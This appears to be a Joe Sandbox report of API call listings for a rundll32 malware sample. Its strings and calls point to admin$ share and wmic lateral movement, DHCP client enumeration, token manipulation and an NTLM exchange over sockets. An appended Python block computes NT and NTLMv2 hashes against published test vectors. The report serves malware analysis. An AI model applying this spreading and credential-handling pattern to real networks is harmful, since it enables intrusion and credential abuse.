                                                                        • Part of subcall function 048568B5: HeapFree.KERNEL32(00000000), ref: 048569A2
                                                                      • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04859EF9
                                                                      • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,04859FCE,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000003,?), ref: 04859F17
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CloseHandleProcess$Path$Filewsprintf$ErrorLast$Connection2Exists$AllocCancelCreateFindFreeThreadTokenmemcpy$AppendCodeCurrentDeleteDirectoryDuplicateExitExtensionNameObjectOpenSingleSystemUserWaitmemset
                                                                      • String ID: %ws $D$W$\\%s\admin$$\\%ws\admin$\%ws$cscc.dat$wbem\wmic.exe
                                                                      • API String ID: 659518118-2685502051
                                                                      • Opcode ID: 1e083ccc9eaea9dbac4401e7aef080f1d6971a319ab9c0400ea1c82f8aa94825
                                                                      • Instruction ID: f8b0926d996780b71ade065ead77b1ac5370cbd0c5be70fb5fc7260262c2abaf
                                                                      • Instruction Fuzzy Hash: EAB1E9B1D00219EFDF519FA4DC84ADEBBBDEF44304F104AA6E909E2120D778AA84DF51
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000010,76ED5E70,?,74DEF380), ref: 048515D9
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048515E2
                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000008), ref: 04851603
                                                                      • GetProcessHeap.KERNEL32(00000008,00000020), ref: 04851633
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04851636
                                                                      • CryptImportKey.ADVAPI32(?,00000000,00000020,00000000,00000100,?), ref: 0485166E
                                                                      • CryptCreateHash.ADVAPI32(?,00008009,?,00000000,?), ref: 04851688
                                                                      • CryptSetHashParam.ADVAPI32(?,00000005,00008003,00000000), ref: 0485169C
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 048516AD
                                                                      • HeapFree.KERNEL32(00000000), ref: 048516B4
                                                                      • CryptCreateHash.ADVAPI32(?,00008002,00000000,00000000,?), ref: 048516CA
                                                                      • CryptHashData.ADVAPI32(?,?,000000FF,00000000), ref: 048516E8
                                                                      • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 04851701
                                                                      • CryptDestroyHash.ADVAPI32(?), ref: 0485171A
                                                                      • CryptDestroyKey.ADVAPI32(?), ref: 04851728
                                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04851737
                                                                      Strings
                                                                      • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 048515F8
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$HashHeap$Process$AllocContextCreateDestroyParam$AcquireDataFreeImportRelease
                                                                      • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                                                      • API String ID: 2620112963-1948191093
                                                                      • Opcode ID: 4732198a9ac9ee7f8be27dd699687f775013653271473afd99e7964ef7a18029
                                                                      • Instruction ID: d3e9f6ed762b9ff6057b94dbd22e5923b32e73026c58665eaebd96cbfd296797
                                                                      • Instruction Fuzzy Hash: BA516C71A00219BBEF119FA5DC48B9FBFB9FF08750F008954F911EA0A0DB749A01DB60
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,000000F0,00000000,00000000), ref: 04855805
                                                                      • GetSystemDefaultLCID.KERNEL32 ref: 0485581D
                                                                      • GetTimeZoneInformation.KERNEL32(?), ref: 0485582D
                                                                      • memcpy.MSVCRT(0000000C,?,00000021,?), ref: 0485584B
                                                                      • NetWkstaGetInfo.NETAPI32(04860494,00000064,?), ref: 04855861
                                                                      • memcpy.MSVCRT(?,?,00000000,?,?,?), ref: 048558C7
                                                                      • memcpy.MSVCRT(0000002D,?,00000000,?,?,?), ref: 048558EA
                                                                      • NetApiBufferFree.NETAPI32(?,?,?,?), ref: 048558F3
                                                                      • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,?,?), ref: 04855924
                                                                      • memcpy.MSVCRT(00000005,?,?,?,?,?), ref: 04855943
                                                                      • LocalFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 0485598C
                                                                      • LocalFree.KERNEL32(00000000,00000000,?,?,?,?), ref: 048559A2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Localmemcpy$Free$Alloc$BufferDefaultInfoInformationSystemTimeWkstaZone
                                                                      • String ID:
                                                                      • API String ID: 2529142246-0
                                                                      • Opcode ID: 2c9f744ca6e5f473892b2eced10d48cd1bc93d2e212bfcb923139269cc132bfa
                                                                      • Instruction ID: e85870a0c5fa0995b101e2a7b309b03b17dc5fee559b1c21d459fc9ca71f9732
                                                                      • Instruction Fuzzy Hash: B251B171900306EFDB219FA8C884EAABBB9FF44314F048E55ED55DB255E778EA00CB51
                                                                      APIs
                                                                      • GetComputerNameExW.KERNEL32(00000004,?,?,00000000,6F994950,00000000), ref: 04858D80
                                                                      • DhcpEnumSubnets.DHCPSAPI(?,?,00000400,?,?,?), ref: 04858DA2
                                                                      • DhcpGetSubnetInfo.DHCPSAPI(00000000,?,?), ref: 04858DCE
                                                                      • DhcpEnumSubnetClients.DHCPSAPI(00000000,?,?,00010000,00000400,?,?), ref: 04858E07
                                                                      • htonl.WS2_32(00000000), ref: 04858E36
                                                                      • htonl.WS2_32(00000000), ref: 04858E44
                                                                      • inet_ntoa.WS2_32(00000000), ref: 04858E47
                                                                        • Part of subcall function 0485641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,74D65350,?,74DF0F00), ref: 04856439
                                                                        • Part of subcall function 0485641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 04856446
                                                                        • Part of subcall function 0485641A: HeapAlloc.KERNEL32(00000000), ref: 0485644D
                                                                        • Part of subcall function 0485641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 04856465
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 04858E65
                                                                      • HeapFree.KERNEL32(00000000), ref: 04858E6C
                                                                      • DhcpRpcFreeMemory.DHCPSAPI(00000400), ref: 04858E81
                                                                      • DhcpRpcFreeMemory.DHCPSAPI(?), ref: 04858E9A
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Dhcp$Heap$Free$ByteCharEnumMemoryMultiProcessSubnetWidehtonl$AllocClientsComputerInfoNameSubnetsinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 4121633671-0
                                                                      • Opcode ID: 176ff8767f1275bd384710618a8e3b386dd17e58f9bbb4829a14732e102844a2
                                                                      • Instruction ID: 63fee3c8f7502dfc896b7e3e62a04fef7be92ea9750b52da8e6962315d3d2ec5
                                                                      • Instruction Fuzzy Hash: 5F41C5B1D00219AFDB11EFE9D8849DEFBFCFB48340B108956E905E7220D774AA458B60
                                                                      APIs
                                                                      • GetCurrentProcessId.KERNEL32(?,04858555,?,?), ref: 04858430
                                                                      • OpenProcess.KERNEL32(00000401,00000000,?,?,?,?,04858555,?,?), ref: 0485844C
                                                                      • OpenProcessToken.ADVAPI32(00000000,0000000E,?,00000000,?,?,?,04858555,?,?), ref: 04858464
                                                                      • DuplicateToken.ADVAPI32(?,00000002,?,?,?,?,04858555,?,?), ref: 0485847D
                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 048584A3
                                                                      • CheckTokenMembership.ADVAPI32(?,?,?), ref: 048584BA
                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 048584CB
                                                                      • FreeSid.ADVAPI32(?), ref: 048584D4
                                                                      • CloseHandle.KERNEL32(?), ref: 048584DD
                                                                      • CloseHandle.KERNEL32(?,?,?,?,04858555,?,?), ref: 048584E2
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,04858555,?,?), ref: 048584E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseHandleToken$Open$AllocateCheckCurrentDuplicateFreeInitializeMembershipTerminate
                                                                      • String ID:
                                                                      • API String ID: 2191316301-0
                                                                      • Opcode ID: cda927eef941170295e07d228f170750a70dde7f1f21e87d0b97634e5a242e5b
                                                                      • Instruction ID: 7acff979969d5fef1b62763ea79e016aeea2fde64e7a7e6d643384407a325715
                                                                      • Instruction Fuzzy Hash: D7212F71900208BFDB10BFA0EC88AAE7BBCEF04741F048566FD01E1060D7389E51DB61
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,00000000,?,?,?,048579E8), ref: 04857CE9
                                                                      • OpenProcessToken.ADVAPI32(00000000,?,00000000,?,?,?,048579E8), ref: 04857CF0
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 04857D02
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04857D25
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 04857D2D
                                                                      • SetLastError.KERNEL32(?,?,00000000,?,?,?,048579E8), ref: 04857D3F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                      • String ID:
                                                                      • API String ID: 2365211911-0
                                                                      • Opcode ID: 257ab18a1c72a5d45ea30631672d02d49f987ee6503651503012393f567dc78e
                                                                      • Instruction ID: 9061c14db1c47f0250023048aa395fbc6b1ff0b182b84d401797d40a4822eb3b
                                                                      • Instruction Fuzzy Hash: 33111E75901218BFEB00AFE5EC489EFBFBCEB08750F108825EA05E2150D7789A45CBE1
                                                                      APIs
                                                                      • CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,?,?,00000000), ref: 048555BC
                                                                      • CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 048555CB
                                                                      • CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000), ref: 048555DA
                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 048555EE
                                                                      • CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000), ref: 04855601
                                                                      • LocalFree.KERNEL32(?), ref: 04855606
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CryptParam$Local$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 3966954206-0
                                                                      • Opcode ID: 0117ff27e28dc3a206c36ad49c9058a6cf2a7a79f10ddc1ba8c8dbb20f2c32a9
                                                                      • Instruction ID: 884cf5703ccf06d59876d339ec3405d084732a0d9ace03882a15339712ac3d3e
                                                                      • Instruction Fuzzy Hash: 7601E9B6900258BFEB11AF95DC84DAFBFBCEB44390F008866FA05A2150D6745A51DA60
                                                                      APIs
                                                                      • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,?,?,?,?), ref: 04855714
                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?), ref: 0485571F
                                                                      • memcpy.MSVCRT(00000000,?,000000F0,?,?,?), ref: 04855736
                                                                      • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04855750
                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0485576E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CryptEncryptLocal$AllocFreememcpy
                                                                      • String ID:
                                                                      • API String ID: 55365748-0
                                                                      • Opcode ID: 5aff170b6b8301fb72d19ae0ef8cb12924284d5269695983f7e4a0b0af88d2d9
                                                                      • Instruction ID: 2f41ded699485109f9459ce2c868b4b305a3880ed4e7115f017797dd47a10a3a
                                                                      • Instruction Fuzzy Hash: F5218E75900215FFCB219FA4DC84E9EBFA8EB08750F104555F904E3254D7719A00CBA0
                                                                      APIs
                                                                      • CryptBinaryToStringW.CRYPT32(?,00000000,00000001,00000000,?), ref: 0485579E
                                                                      • LocalAlloc.KERNEL32(00000040,?,00000000,?,04855988,00000000,?,?,?,?,?,?,?,?), ref: 048557AD
                                                                      • CryptBinaryToStringW.CRYPT32(?,00000000,00000001,00000000,?), ref: 048557C6
                                                                      • LocalFree.KERNEL32(00000000,?,04855988,00000000,?,?,?,?,?,?,?,?), ref: 048557D6
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: BinaryCryptLocalString$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 4291131564-0
                                                                      • Opcode ID: 7c6118e2127e699db00e33dced2a72c9950b46cc148f36b9029e4b893f3671a3
                                                                      • Instruction ID: 96e21462a4593cd78f8356ed6b4dec50f7de2aa29fca5dcf97aef4f37b13a745
                                                                      • Instruction Fuzzy Hash: DB014B7620020DFFEB019E98DC80EAE7BADEB44754F108466BE00D7214EBB5DE019B60
                                                                      APIs
                                                                      • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,00000000,?,?,048562E9,?,?,?,?), ref: 04856260
                                                                      • CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,048562E9,?,?,?,?), ref: 04856273
                                                                      • CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,048562E9,?,?,?,?), ref: 04856289
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CryptHash$CreateDataParam
                                                                      • String ID:
                                                                      • API String ID: 3669532303-0
                                                                      • Opcode ID: d44bf9d8e67cd2397e7736318084c1b8ee9e46f8cfe1b0c6f644987901c386bb
                                                                      • Instruction ID: caf673d7beb2d16e51f43746f9f5b206020ef9c3fffe6dbb53cf6c3ec13e04e3
                                                                      • Opcode Fuzzy Hash: d44bf9d8e67cd2397e7736318084c1b8ee9e46f8cfe1b0c6f644987901c386bb
                                                                      • Instruction Fuzzy Hash: C7F0BDB5200308FFE7119FA5ED85E6B77FDFB44744B508829F606E6150D775AD448B20
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,04851C7A,00000000,?,00000000,00000000,?,?,00000003,00000000,?,00000000), ref: 04851783
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0485178C
                                                                      • CharUpperW.USER32(00000000), ref: 048517B2
                                                                      • GetProcessHeap.KERNEL32(00000008,00000086), ref: 048517DA
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048517DD
                                                                      • htons.WS2_32(00000082), ref: 04851801
                                                                      • send.WS2_32(00000086,?,00000086,00000041), ref: 04851863
                                                                      • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 0485187F
                                                                      • GetProcessHeap.KERNEL32(00000008,00000018), ref: 048518F4
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048518FD
                                                                      • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000,?,00008003,00008003,?,?,00000000,?,00008002), ref: 04851958
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0485195B
                                                                      • rand.MSVCRT ref: 04851983
                                                                      • GetProcessHeap.KERNEL32(00000008,00000018,?,00000010,?,?,00008003), ref: 048519B8
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048519BB
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04851A13
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04851A16
                                                                      • htons.WS2_32(-000000FC), ref: 04851A39
                                                                      • memcpy.MSVCRT(00000087,?,?), ref: 04851B48
                                                                      • send.WS2_32(?,00000000,00000000,00000000), ref: 04851B7A
                                                                      • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04851B93
                                                                      • memset.MSVCRT ref: 04851BAB
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04851BB6
                                                                      • HeapFree.KERNEL32(00000000), ref: 04851BBD
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04851BC8
                                                                      • HeapFree.KERNEL32(00000000), ref: 04851BCF
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 04851BE3
                                                                      • HeapFree.KERNEL32(00000000), ref: 04851BE6
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000010,?,?,00008003), ref: 04851BF1
                                                                      • HeapFree.KERNEL32(00000000), ref: 04851BF4
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 04851BFF
                                                                      • HeapFree.KERNEL32(00000000), ref: 04851C02
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,00008002), ref: 04851C0D
                                                                      • HeapFree.KERNEL32(00000000), ref: 04851C10
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 04851C19
                                                                      • HeapFree.KERNEL32(00000000), ref: 04851C1C
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 04851C27
                                                                      • HeapFree.KERNEL32(00000000), ref: 04851C2A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free$Alloc$htonsrecvsend$CharUppermemcpymemsetrand
                                                                      • String ID: NTLM$SSP
                                                                      • API String ID: 2370844593-3976291102
                                                                      • Opcode ID: 17f0d037e789fa4dc0ddb4aabbe26d35a9d8a0bcbfe4a9067d0bb0e360d0dbc8
                                                                      • Instruction ID: 63024ccbc3ecf13f69a3368e741de3f307a286cab2c37a27d629d8d313b2cfd5
                                                                      • Opcode Fuzzy Hash: 17f0d037e789fa4dc0ddb4aabbe26d35a9d8a0bcbfe4a9067d0bb0e360d0dbc8
                                                                      • Instruction Fuzzy Hash: 69F1C071900306AFDB10DFA8C889BAA7BF4FF48300F048959ED45DB2A1EB79E845CB55
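The function above carries the strings NTLM and SSP, calls CharUpperW, and has the CryptoAPI algorithm identifiers 0x8003 (CALG_MD5) and 0x8002 (CALG_MD4) on its stack; the short function before it runs CryptCreateHash(CALG_MD5), CryptHashData and CryptGetHashParam(HP_HASHVAL = 2). MD4 over the UTF-16LE password is the NT hash, and HMAC-MD5 keyed with that hash is the NTLMv2 one-way function, so the primitives here are those of NTLM authentication. The following is an added example, not code from the sample and not Joe Sandbox output: it computes the NT hash, NTOWFv2 and an NTLMv2 response in Python and checks them against the published MS-NLMP test vectors. Which NTLM step the sample's CharUpperW actually serves is an assumption; NTOWFv2 upper-cases the user name, so that is the step shown. MD4 is implemented inline because OpenSSL 3 builds of hashlib frequently lack it.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def _rol(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320, in pure Python: OpenSSL 3 builds of hashlib often have no 'md4'."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, list(range(16)), (3, 7, 11, 19), 0),
        (g, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (h, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    # Padding: 0x80, zeros up to 56 mod 64, then the bit length as a little-endian 64-bit integer.
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        r = state[:]
        for fn, order, shifts, k in rounds:
            for i, idx in enumerate(order):
                t = (-i) % 4  # target register cycles a, d, c, b as in the RFC's step tables
                acc = (r[t] + fn(r[(t + 1) % 4], r[(t + 2) % 4], r[(t + 3) % 4]) + x[idx] + k) & MASK32
                r[t] = _rol(acc, shifts[i % 4])
        state = [(s + v) & MASK32 for s, v in zip(state, r)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password (CryptoAPI CALG_MD4 = 0x8002)."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 (MS-NLMP 3.3.2): HMAC-MD5 keyed with the NT hash over UPPER(user) || domain in UTF-16LE.
    The upper-casing is the step a CharUpperW call would serve; that the sample uses it here is an assumption."""
    key = nt_hash(password)
    return hmac.new(key, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def av_pair(av_id: int, text: str) -> bytes:
    """One AV_PAIR of the target-info list: id, byte length, UTF-16LE value."""
    value = text.encode("utf-16-le")
    return struct.pack("<HH", av_id, len(value)) + value


def build_temp(client_challenge: bytes, filetime: int, target_info: bytes) -> bytes:
    """The NTLMv2 'temp' blob: 01 01, six zero bytes, FILETIME, client nonce, four zeros, AV pairs, four zeros."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", filetime) + client_challenge
            + b"\x00" * 4 + target_info + b"\x00" * 4)


def ntlmv2_response(ntowf2: bytes, server_challenge: bytes, temp: bytes) -> bytes:
    """NTLMv2 response = NTProofStr || temp, with NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || temp)."""
    nt_proof = hmac.new(ntowf2, server_challenge + temp, hashlib.md5).digest()
    return nt_proof + temp


# Published test vectors from MS-NLMP section 4.2 (User / Domain / Password); none of these come from the sample.
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
CLIENT_CHALLENGE = b"\xaa" * 8
TARGET_INFO = av_pair(2, "Domain") + av_pair(1, "Server") + struct.pack("<HH", 0, 0)  # NbDomain, NbComputer, EOL


def ms_nlmp_example() -> dict:
    """Run the whole chain on the MS-NLMP vectors and return the intermediate values as hex."""
    ntowf2 = ntowf_v2("Password", "User", "Domain")
    temp = build_temp(CLIENT_CHALLENGE, 0, TARGET_INFO)
    response = ntlmv2_response(ntowf2, SERVER_CHALLENGE, temp)
    return {"nt_hash": nt_hash("Password").hex(), "ntowf_v2": ntowf2.hex(),
            "nt_proof_str": response[:16].hex(), "response_len": len(response)}


if __name__ == "__main__":
    for name, value in ms_nlmp_example().items():
        print(f"{name:14} {value}")
```

Seeing the chain end to end is what makes the API sequence readable: an NT hash is a single MD4 call with no salt, which is why a dumped hash is directly reusable, and everything after it is HMAC-MD5 over values the client chooses (client nonce, timestamp, target info), so the only server-controlled input is the 8-byte challenge.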
                                                                      APIs
